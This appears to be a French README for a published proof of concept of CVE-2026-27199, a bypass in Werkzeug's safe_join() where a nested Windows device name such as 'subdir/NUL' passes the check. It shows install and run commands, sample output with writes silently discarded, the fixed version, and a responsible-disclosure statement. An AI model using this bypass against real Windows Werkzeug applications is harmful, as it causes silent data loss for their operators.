
Preuve de concept d'exploitation pour CVE-2026-27199, un contournement du nom de périphérique Windows de la fonction safe_join() de Werkzeug, démontrant un parcours de chemin et une suppression silencieuse de données.
safe_join() de WerkzeugStatut : Divulgué publiquement. Corrigé dans werkzeug 3.1.6.
Sévérité : Modérée
Signaleur : @alimezar
Avis de sécurité : GHSA-29vq-49wr-vm6x
| Package | Affecté | Corrigé |
|---|---|---|
| werkzeug | < 3.1.6 | 3.1.6 |
Prérequis : Windows, Python 3.8+,
werkzeug < 3.1.6
pip install "werkzeug==3.1.5"
python poc_CVE-2026-27199.py
============================================================
CVE-2026-27199 — PoC safe_join() de Werkzeug
============================================================
[*] Version de Werkzeug : 3.1.5
[*] os.name : nt
[+] safe_join(base, 'NUL') -> None (correctement bloqué)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL (contournement !)
[*] Tentative d'écriture dans le chemin renvoyé ...
[!] open(NUL imbriqué) écriture : SUCCÈS — données silencieusement ignorées par le périphérique
[!] VULNÉRABLE : CVE-2026-27199 confirmé sur cette installation.
Mettez à niveau vers werkzeug >= 3.1.6 pour corriger.
[+] safe_join(base, 'subdir/NUL') -> None (correctement bloqué)
[+] NON VULNÉRABLE : le nom de périphérique imbriqué a été bloqué.
Ce PoC est publié à des fins éducatives et défensives, conformément à la divulgation responsable et à la disponibilité publique du correctif.